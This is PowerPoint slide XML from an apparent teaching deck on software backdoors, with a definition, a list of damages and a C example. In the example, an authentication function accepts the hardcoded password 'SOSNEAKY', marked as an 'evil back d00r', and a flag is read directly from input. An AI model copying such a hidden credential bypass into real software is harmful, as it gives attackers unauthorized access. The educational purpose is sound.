                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="58"/>
                      <a:pt x="454" y="0"/>
                      <a:pt x="533" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FEC928"/>
              </a:solidFill>
              <a:ln w="0">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:srgbClr val="005CA2">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:srgbClr val="005CA2"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:srgbClr val="005CA2"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="44" name="组合 43"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16780" y="7047"/>
              <a:ext cx="429" cy="359"/>
              <a:chOff x="13803" y="6625"/>
              <a:chExt cx="938" cy="938"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="任意多边形 44"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13803" y="6625"/>
                <a:ext cx="939" cy="939"/>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28" h="1025">
                    <a:moveTo>
                      <a:pt x="533" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="0"/>
                      <a:pt x="690" y="71"/>
                      <a:pt x="690" y="158"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="690" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="151"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="134"/>
                      <a:pt x="755" y="124"/>
                      <a:pt x="788" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="874" y="124"/>
                      <a:pt x="945" y="195"/>
                      <a:pt x="945" y="282"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="325"/>
                      <a:pt x="927" y="364"/>
                      <a:pt x="899" y="393"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="895" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="398"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="413"/>
                      <a:pt x="1028" y="476"/>
                      <a:pt x="1028" y="553"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="637"/>
                      <a:pt x="962" y="706"/>
                      <a:pt x="879" y="710"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="876" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="712"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="890" y="735"/>
                      <a:pt x="897" y="760"/>
                      <a:pt x="897" y="788"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="897" y="874"/>
                      <a:pt x="826" y="945"/>
                      <a:pt x="740" y="945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="696" y="945"/>
                      <a:pt x="657" y="927"/>
                      <a:pt x="628" y="899"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="627" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="612" y="971"/>
                      <a:pt x="549" y="1025"/>
                      <a:pt x="473" y="1025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1025"/>
                      <a:pt x="315" y="954"/>
                      <a:pt x="315" y="868"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="865"/>
                      <a:pt x="315" y="862"/>
                      <a:pt x="315" y="859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="316" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="860"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="877"/>
                      <a:pt x="250" y="887"/>
                      <a:pt x="218" y="887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="887"/>
                      <a:pt x="60" y="816"/>
                      <a:pt x="60" y="730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="691"/>
                      <a:pt x="73" y="657"/>
                      <a:pt x="96" y="629"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="104" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="618"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="594"/>
                      <a:pt x="0" y="538"/>
                      <a:pt x="0" y="473"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="47" y="342"/>
                      <a:pt x="111" y="322"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="124" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="317"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="294"/>
                      <a:pt x="104" y="269"/>
                      <a:pt x="104" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="155"/>
                      <a:pt x="175" y="84"/>
                      <a:pt x="262" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305" y="84"/>
                      <a:pt x="344" y="102"/>
                      <a:pt x="373" y="130"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="58"/>
                      <a:pt x="454" y="0"/>
                      <a:pt x="533" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FED65A"/>
              </a:solidFill>
              <a:ln w="3175">
                <a:solidFill>
                  <a:srgbClr val="E4374B"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:srgbClr val="005CA2">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:srgbClr val="005CA2"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:srgbClr val="005CA2"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="任意多边形 46"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="14072" y="6894"/>
                <a:ext cx="400" cy="40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28" h="1025">
                    <a:moveTo>
                      <a:pt x="533" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="619" y="0"/>
                      <a:pt x="690" y="71"/>
                      <a:pt x="690" y="158"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="690" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="151"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="134"/>
                      <a:pt x="755" y="124"/>
                      <a:pt x="788" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="874" y="124"/>
                      <a:pt x="945" y="195"/>
                      <a:pt x="945" y="282"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="325"/>
                      <a:pt x="927" y="364"/>
                      <a:pt x="899" y="393"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="895" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="398"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="974" y="413"/>
                      <a:pt x="1028" y="476"/>
                      <a:pt x="1028" y="553"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="637"/>
                      <a:pt x="962" y="706"/>
                      <a:pt x="879" y="710"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="876" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="712"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="890" y="735"/>
                      <a:pt x="897" y="760"/>
                      <a:pt x="897" y="788"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="897" y="874"/>
                      <a:pt x="826" y="945"/>
                      <a:pt x="740" y="945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="696" y="945"/>
                      <a:pt x="657" y="927"/>
                      <a:pt x="628" y="899"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="627" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="612" y="971"/>
                      <a:pt x="549" y="1025"/>
                      <a:pt x="473" y="1025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1025"/>
                      <a:pt x="315" y="954"/>
                      <a:pt x="315" y="868"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="865"/>
                      <a:pt x="315" y="862"/>
                      <a:pt x="315" y="859"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="316" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="860"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="877"/>
                      <a:pt x="250" y="887"/>
                      <a:pt x="218" y="887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="887"/>
                      <a:pt x="60" y="816"/>
                      <a:pt x="60" y="730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="691"/>
                      <a:pt x="73" y="657"/>
                      <a:pt x="96" y="629"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="104" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="618"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="594"/>
                      <a:pt x="0" y="538"/>
                      <a:pt x="0" y="473"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="402"/>
                      <a:pt x="47" y="342"/>
                      <a:pt x="111" y="322"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="124" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="317"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="294"/>
                      <a:pt x="104" y="269"/>
                      <a:pt x="104" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="155"/>
                      <a:pt x="175" y="84"/>
                      <a:pt x="262" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305" y="84"/>
                      <a:pt x="344" y="102"/>
                      <a:pt x="373" y="130"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="134"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="58"/>
                      <a:pt x="454" y="0"/>
                      <a:pt x="533" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FEC928"/>
              </a:solidFill>
              <a:ln w="0">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:srgbClr val="005CA2">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:srgbClr val="005CA2"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:srgbClr val="005CA2"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="220" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313437387d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1719" y="3352"/>
              <a:ext cx="16292" cy="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457200" indent="-457200">
                <a:lnSpc>
                  <a:spcPts val="4000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="p"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                </a:rPr>
                <a:t>A backdoor is a hidden means of accessing a computer system or encrypted data that bypasses normal authentication and security measures. It can be </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                </a:rPr>
                <a:t>intentionally added by manufacturers or attackers for malicious purposes.</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>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0" y="6393815"/>
            <a:ext cx="12364085" cy="61023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内容占位符 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="318770"/>
            <a:ext cx="1120648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Example</a:t>
            </a:r>
            <a:endPar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Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888365" y="962025"/>
            <a:ext cx="5386070" cy="5492750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="07A7AF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>char *sneaky = "SOSNEAKY";</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int authenticate(char *username, char *password)</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char stored_pw[9];</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stored_pw[8] = 0;</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int pwfile;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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 evil back d00r</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>if (strcmp(password, sneaky) == 0) return 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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pwfile = open(username, O_RDONLY);</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read(pwfile, stored_pw, 8);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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if (strcmp(password, stored_pw) == 0) return 1;</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return 0;</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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int accepted()</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printf("Welcome to the admin console, trusted user!\n");</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int rejected()</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printf("Go away!");</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exit(1);</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854190" y="1123315"/>
            <a:ext cx="4450715" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>int main(int argc, char **argv)</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char username[9];</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char password[9];</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int authed;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pP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username[8] = 0;</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password[8] = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pP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printf("Username: \n");</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read(0, username, 8);</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read(0, &amp;authed, 1);</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printf("Password: \n");</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read(0, password, 8);</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read(0, &amp;authed, 1);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pP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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>authed = authenticate(username, password);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (authed) accepted();</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else rejected();</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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Damages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5" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313534347d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="236220" y="1098550"/>
            <a:ext cx="11828780" cy="102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33400">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="15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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Backdoors can cause significant damage to a system and its users. Some of the potential consequences of a backdoor include:</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="475933" y="2271395"/>
            <a:ext cx="11240135" cy="3476625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="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438150">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00B0F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Security compromise:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Backdoors provide a means of bypassing normal security measures, making a system vulnerable to unauthorized access and exploitation.</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2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00B0F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Data theft:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Attackers can use backdoors to steal sensitive information, such as login credentials, financial data, or intellectual property.</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2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00B0F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Spread of malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Backdoors can be used as a launch point for further attacks, such as spreading malware to other systems.</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2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00B0F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Reputation damage:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> The discovery of a backdoor can severely damage the reputation of a company or organization, potentially leading to loss of business and customers.</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133350" indent="0">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203"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srcRect t="4519" b="16150"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12179935" cy="6889750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12192000" cy="690054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charset="0"/>
              <a:ea typeface="阿里巴巴普惠体 R" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
